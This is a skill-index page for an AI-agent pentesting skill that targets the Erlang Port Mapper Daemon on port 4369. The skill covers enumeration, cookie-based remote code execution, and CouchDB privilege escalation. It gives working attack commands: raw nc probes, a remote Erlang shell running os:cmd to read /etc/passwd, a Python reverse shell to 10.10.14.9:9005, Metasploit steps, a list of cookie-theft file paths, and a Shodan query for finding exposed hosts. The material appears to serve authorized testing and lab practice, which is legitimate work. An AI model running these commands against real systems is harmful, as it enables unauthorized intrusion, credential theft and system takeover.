OpenSkillIndex← back to search

Hacktricks-skills epmd-pentest

Pentest Erlang Port Mapper Daemon (epmd) on port 4369. Use this skill whenever you need to enumerate, assess, or exploit epmd services during security assessments. Trigger this when you see port 4369 open, when working with RabbitMQ or CouchDB installations, when you need to extract Erlang node information, or when attempting cookie-based RCE attacks. Don't forget to use this for any epmd-related reconnaissance or exploitation tasks.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd/SKILL.MD
source content

EPMD Pentesting Skill

This skill helps you enumerate and exploit the Erlang Port Mapper Daemon (epmd) service, commonly found on port 4369 in RabbitMQ and CouchDB installations.

When to Use This Skill

  • Port 4369 is open during network scanning
  • You're assessing RabbitMQ or CouchDB infrastructure
  • You need to enumerate Erlang node names and ports
  • You have access to an Erlang cookie and want to attempt RCE
  • You're doing distributed Erlang security assessments

Enumeration

Quick Manual Check

Send a raw EPMD query to verify the service is responding:

echo -n -e "\x00\x01\x6e" | nc -vn <TARGET_IP> 4369

This sends a name query (0x6e = 'n') to the EPMD daemon. A response indicates the service is active.

Nmap Enumeration

Use Nmap's epmd-info script for comprehensive enumeration:

nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <TARGET_IP>

This reveals:

  • EPMD port number
  • All registered Erlang nodes
  • Port mappings for each node

Example output:

| epmd-info:
|   epmd_port: 4369
|   nodes:
|     bigcouch: 11502
|     freeswitch: 8031
|     ecallmgr: 11501
|_    kazoo-rabbitmq: 25672

Erlang Client Enumeration

If you have Erlang installed, you can query node names directly:

# Install Erlang (Ubuntu/Debian)
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
# or
apt-get install erlang

# Start Erlang shell and query
erl
1> net_adm:names('<TARGET_HOST>').

This returns the listening addresses for the target host.

Erlang Cookie RCE

The Erlang cookie is the authentication mechanism for distributed Erlang. If you can obtain it, you can execute arbitrary code on the target.

Cookie Location

The cookie is typically stored in:

  • ~/.erlang.cookie
    on the target system
  • Generated as a random 20-character string [A-Z] on first Erlang start
  • May be configured manually in some deployments

Remote Code Execution

Once you have the cookie, connect remotely:

erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn

This opens an Erlang shell on the remote system. Execute commands:

(test@target.fqdn)1> os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"

(test@target.fqdn)2> os:cmd("cat /etc/passwd").

Local Privilege Escalation (CouchDB)

If you're already on the system and have the cookie, abuse CouchDB for privilege escalation:

HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE

Then execute commands via RPC:

(anonymous@localhost)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"

(anonymous@localhost)2> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" ]).

Metasploit Exploitation

Metasploit has a module for Erlang cookie RCE:

msfconsole
use exploit/multi/misc/erlang_cookie_rce
set RHOSTS <TARGET_IP>
set ERLANG_COOKIE <YOUR_COOKIE>
set TARGETNAME <node@target>
exploit

Cookie Discovery Techniques

Brute Force

If the cookie is weak or predictable, you can attempt brute force:

  • Use epmd_bf tool (available from security research sources)
  • Try common default cookies
  • Check for cookies in configuration files
  • Look for cookies in environment variables

Information Gathering

Check these locations for exposed cookies:

  • /etc/rabbitmq/erlang.cookie
  • /var/lib/rabbitmq/.erlang.cookie
  • /opt/couchdb/etc/vm.args
  • Application configuration files
  • Environment variables in process listings

Shodan Reconnaissance

Find exposed EPMD services on the internet:

# Shodan query for EPMD services
port:4369 "at port"

This can help identify:

  • Internet-facing EPMD instances
  • Potential targets for assessment
  • Misconfigured services

Safety and Legal Considerations

  • Only test systems you have explicit authorization to assess
  • EPMD exploitation can cause service disruption
  • Document all findings and coordinate with system owners
  • Follow responsible disclosure practices

Practice Environment

The Canape HTB machine provides a safe environment to practice EPMD exploitation techniques.

References